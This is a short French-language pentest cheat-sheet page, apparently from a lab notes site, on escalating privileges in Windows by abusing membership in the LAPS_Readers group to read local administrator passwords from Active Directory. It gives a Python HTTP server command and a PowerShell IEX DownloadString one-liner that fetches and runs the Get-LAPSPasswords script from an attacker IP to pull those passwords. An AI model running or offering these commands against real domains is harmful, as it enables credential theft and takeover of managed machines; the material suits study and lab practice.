LAPS Readers (whoami /priv) - Windows Privilege Escalation

Le groupe LAPS_Readers dans Windows est utilisé pour gérer l'accès aux mots de passe administratifs locaux stockés dans Active Directory (via la fonctionnalité Local Administrator Password Solution, ou LAPS). Les membres de ce groupe peuvent lire les mots de passe générés et stockés par LAPS pour les comptes administratifs locaux sur les machines gérées. Cela permet un accès contrôlé et sécurisé aux mots de passe tout en limitant les privilèges des utilisateurs non autorisés.

Utilisation de Get-LAPSPasswords pour extraire les mots de passe

GitHub - kfosaaen/Get-LAPSPasswords: Powershell function to pull the local admin passwords from LDAP, stored there by LAPS.GitHub

Téléchargement du script Get-LAPSPasswords

python3 -m http.server 80

IEX(New-object Net.WebClient).downloadString('http://10.10.16.4/Get-LAPSPasswords.ps1')

Exécution du script et récupération des mots de passe administratifs

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?